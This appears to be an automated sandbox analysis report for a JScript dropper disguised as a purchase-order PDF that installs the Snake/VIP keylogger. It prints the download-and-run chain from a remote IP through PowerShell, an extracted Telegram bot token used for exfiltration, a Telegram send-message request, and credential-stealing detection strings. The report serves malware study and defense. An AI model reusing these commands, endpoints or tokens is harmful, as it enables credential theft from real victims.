
Windows Analysis Report
PO-2513203-PDF.js

Overview

General Information

Sample name: PO-2513203-PDF.js
Analysis ID: 1637032
MD5: 906b55eae679c02012dfa19c9df27e4b
SHA1: 1bdaf20e8504d85b1e72dd7ca29618cd8180fac0
SHA256: e50337355671948435c054c46ff0ab2bc1acb920414842e34f1203c40ac7464b
Tags: js, SnakeKeylogger, user-lowmal3

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Potential obfuscated javascript found
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7272 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: FC2AA7BEED400468B816DB83CF00815D)
        • x.exe (PID: 2424 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: FC2AA7BEED400468B816DB83CF00815D)
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Bot Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat id": "6163418482"}
{"Exfil Mode": "Telegram", "Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat_id": "6163418482", "Version": "4.4"}
Source: dump.pcap; Rule: JoeSecurity_VIPKeylogger; Description: Yara detected VIP Keylogger; Author: Joe Security
Source: dump.pcap; Rule: Windows_Trojan_SnakeKeylogger_af3faa65; Description: unknown; Author: unknown; Strings:
  • 0x5235c:$a1: get_encryptedPassword
  • 0x526cb:$a2: get_encryptedUsername
  • 0x5216c:$a3: get_timePasswordChanged
  • 0x52275:$a4: get_passwordField
  • 0x52372:$a5: set_encryptedPassword
  • 0x53c96:$a7: get_logins
  • 0x53bf9:$a10: KeyLoggerEventArgs
  • 0x53734:$a11: KeyLoggerEventArgsEventHandler
Source: 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_SnakeKeylogger; Description: Yara detected Snake Keylogger; Author: Joe Security
Source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_VIPKeylogger; Description: Yara detected VIP Keylogger; Author: Joe Security
Source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
Source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp; Rule: Windows_Trojan_SnakeKeylogger_af3faa65; Description: unknown; Author: unknown; Strings:
  • 0x1e00a:$a1: get_encryptedPassword
  • 0x1e333:$a2: get_encryptedUsername
  • 0x1de1a:$a3: get_timePasswordChanged
  • 0x1df23:$a4: get_passwordField
  • 0x1e020:$a5: set_encryptedPassword
  • 0x1f702:$a7: get_logins
  • 0x1f665:$a10: KeyLoggerEventArgs
  • 0x1f2ca:$a11: KeyLoggerEventArgsEventHandler
Source: 10.2.x.exe.44695b0.3.unpack; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 10.2.x.exe.44695b0.3.unpack; Rule: JoeSecurity_VIPKeylogger; Description: Yara detected VIP Keylogger; Author: Joe Security
Source: 10.2.x.exe.44695b0.3.unpack; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
Source: 10.2.x.exe.44695b0.3.unpack; Rule: Windows_Trojan_SnakeKeylogger_af3faa65; Description: unknown; Author: unknown; Strings:
  • 0x2bc9a:$a1: get_encryptedPassword
  • 0x2bfc3:$a2: get_encryptedUsername
  • 0x2baaa:$a3: get_timePasswordChanged
  • 0x2bbb3:$a4: get_passwordField
  • 0x2bcb0:$a5: set_encryptedPassword
  • 0x2d392:$a7: get_logins
  • 0x2d2f5:$a10: KeyLoggerEventArgs
  • 0x2cf5a:$a11: KeyLoggerEventArgsEventHandler
Source: 10.2.x.exe.44695b0.3.unpack; Rule: MAL_Envrial_Jan18_1; Description: Detects Encrial credential stealer malware; Author: Florian Roth; Strings:
  • 0x39a41:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x390e4:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x39341:$a4: \Orbitum\User Data\Default\Login Data
  • 0x39d20:$a5: \Kometa\User Data\Default\Login Data

System Summary

Source: Network Connection; Author: frack113, Florian Roth; Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7272, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49717
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", ProcessId: 7272, ProcessName: wscript.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7272, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49717
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", ProcessId: 7272, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", ProcessId: 7912, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-13T10:21:58.364550+0100 | 2018856 | 1 | A Network Trojan was detected | 176.65.144.3 | 80 | 192.168.2.4 | 49717 | TCP
2025-03-13T10:22:10.588743+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49727 | 104.21.112.1 | 443 | TCP
2025-03-13T10:22:13.480604+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49729 | 104.21.112.1 | 443 | TCP
2025-03-13T10:22:05.613647+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49725 | 132.226.247.73 | 80 | TCP
2025-03-13T10:22:08.301188+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49725 | 132.226.247.73 | 80 | TCP
2025-03-13T10:22:11.332437+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49728 | 132.226.247.73 | 80 | TCP
2025-03-13T10:22:34.700827+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49742 | 149.154.167.220 | 443 | TCP


AV Detection

Source: http://176.65.144.3/dev/believe.exe; Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\x.exe; Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dll; Avira: detection malicious, Label: HEUR/AGEN.1300034
Source: 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat id": "6163418482"}
Source: 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat_id": "6163418482", "Version": "4.4"}
Source: PO-2513203-PDF.js; Virustotal: Detection: 17%
Source: PO-2513203-PDF.js; ReversingLabs: Detection: 18%
Source: 10.2.x.exe.44695b0.3.unpack; String decryptor: 7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o
Source: 10.2.x.exe.44695b0.3.unpack; String decryptor: 6163418482
Source: 10.2.x.exe.44695b0.3.unpack; String decryptor: (empty string)

Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: unknown; HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49726 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: Binary string: CZG3HF22.pdbH; source: x.exe, 0000000A.00000000.1404811393.0000000000842000.00000002.00000001.01000000.00000008.sdmp, x.exe.8.dr
Source: Binary string: CZG3HF22.pdb; source: x.exe, 0000000A.00000000.1404811393.0000000000842000.00000002.00000001.01000000.00000008.sdmp, x.exe.8.dr

Software Vulnerabilities

Source: PO-2513203-PDF.js; Return value: ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5']
Source: PO-2513203-PDF.js; Return value: ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']
Source: PO-2513203-PDF.js; Argument value: ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']
Source: PO-2513203-PDF.js; Return value: ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']
Source: PO-2513203-PDF.js; Return value: ['"WScript.Shell"', 'WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', '"Scripting.FileSystemObject"', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']
Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 00E947D7h; 10_2_00E94688
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 00E9482Ch; 10_2_00E94688
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 00ECF45Dh; 11_2_00ECF2C0
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 00ECF45Dh; 11_2_00ECF4AC
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 00ECF45Dh; 11_2_00ECF52F
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 00ECFC19h; 11_2_00ECF960
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 06842D41h; 11_2_06842A90
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 06843308h; 11_2_06842EF0
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 0684DD71h; 11_2_0684DAC8
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 06843308h; 11_2_06842EE7
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 0684D4C1h; 11_2_0684D218
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 06843308h; 11_2_06843236
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 0684D919h; 11_2_0684D670
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h; 11_2_06840673
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 0684EA79h; 11_2_0684E7D0
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 0684E1C9h; 11_2_0684DF20
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 06840D0Dh; 11_2_06840B30
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 068416F8h; 11_2_06840B30
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 0684E621h; 11_2_0684E378
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 0684F329h; 11_2_0684F080
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 0684F781h; 11_2_0684F4D8
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 0684EED1h; 11_2_0684EC28
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h; 11_2_06840040
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h; 11_2_06840853
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 0684D069h; 11_2_0684CDC0
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 4x nop then jmp 0684FBD9h; 11_2_0684F930

Networking

Source: Network traffic; Suricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 176.65.144.3:80 -> 192.168.2.4:49717
Source: Network traffic; Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49742 -> 149.154.167.220:443
Source: C:\Windows\System32\wscript.exe; Network Connect: 176.65.144.3 80
Source: PO-2513203-PDF.js; Argument value: ['"MSXML2.XMLHTTP"']
Source: PO-2513203-PDF.js; Argument value: ['"GET","http://176.65.144.3/dev/believe.ps1",false']
Source: PO-2513203-PDF.js; Return value: ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5']
Source: PO-2513203-PDF.js; Return value: ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']
Source: PO-2513203-PDF.js; Argument value: ['"MSXML2.XMLHTTP","BK7$"']
Source: PO-2513203-PDF.js; Return value: ['WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8']
Source: PO-2513203-PDF.js; Argument value: ['"http://176.65.144.3/dev/believe.ps1","C:\\Temp\\WTRTRWFSHS.ps1"']
Source: PO-2513203-PDF.js; Return value: ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']
Source: PO-2513203-PDF.js; Return value: ['"MSXML2.XMLHTTP"']
Source: unknown; DNS query: name: api.telegram.org
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Thu, 13 Mar 2025 09:22:03 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
    Last-Modified: Mon, 17 Feb 2025 11:23:00 GMT
    ETag: "43600-62e54bf3d7570"
    Accept-Ranges: bytes
    Content-Length: 275968
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
    Data Raw: (hex dump of the 275968-byte PE response body, not reproduced)
Source: global traffic; HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2014/03/2025%20/%2012:09:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /dev/believe.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
                  Source: Joe Sandbox View | IP Address: 149.154.167.220
                  Source: Joe Sandbox View | IP Address: 104.21.112.1
                  Source: Joe Sandbox View | IP Address: 104.21.112.1
                  Source: Joe Sandbox View | IP Address: 132.226.247.73
                  Source: Joe Sandbox View | ASN Name: PALTEL-ASPALTELAutonomousSystemPS
                  Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknown | DNS query: name: checkip.dyndns.org
                  Source: unknown | DNS query: name: reallyfreegeoip.org
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49728 -> 132.226.247.73:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49725 -> 132.226.247.73:80
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49727 -> 104.21.112.1:443
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49729 -> 104.21.112.1:443
                  Source: global traffic | HTTP traffic detected: GET /dev/believe.ps1 HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 176.65.144.3 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49726 version: TLS 1.0
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
